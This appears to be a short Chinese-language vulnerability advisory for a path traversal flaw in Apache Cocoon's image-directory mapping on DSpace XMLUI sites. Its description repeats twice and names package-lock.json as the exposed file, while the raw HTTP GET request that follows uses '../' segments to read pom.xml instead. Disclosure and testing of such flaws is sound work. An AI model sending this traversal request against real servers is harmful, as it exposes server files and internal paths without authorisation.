Description
Apache Cocoon 是基于 Java 的 Web 开发框架,提供 XML 发布与内容聚合能力,常用于 XML/发布型站点(如 DSpace 的门户前端)。其静态资源映射对图片目录的路径跳转缺乏有效校验,未认证攻击者可构造跨目录路径读取服务器上的 package-lock.json 等文件,泄露项目依赖结构与内部路径信息,造成信息泄露。
Apache Cocoon 是基于 Java 的 Web 开发框架,提供 XML 发布与内容聚合能力,常用于 XML/发布型站点(如 DSpace 的门户前端)。其静态资源映射对图片目录的路径跳转缺乏有效校验,未认证攻击者可构造跨目录路径读取服务器上的 package-lock.json 等文件,泄露项目依赖结构与内部路径信息,造成信息泄露。
GET /xmlui/themes/Mirage2/images/UCrea/pc/../../../../../../../pom.xml HTTP/1.1
Host:
# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.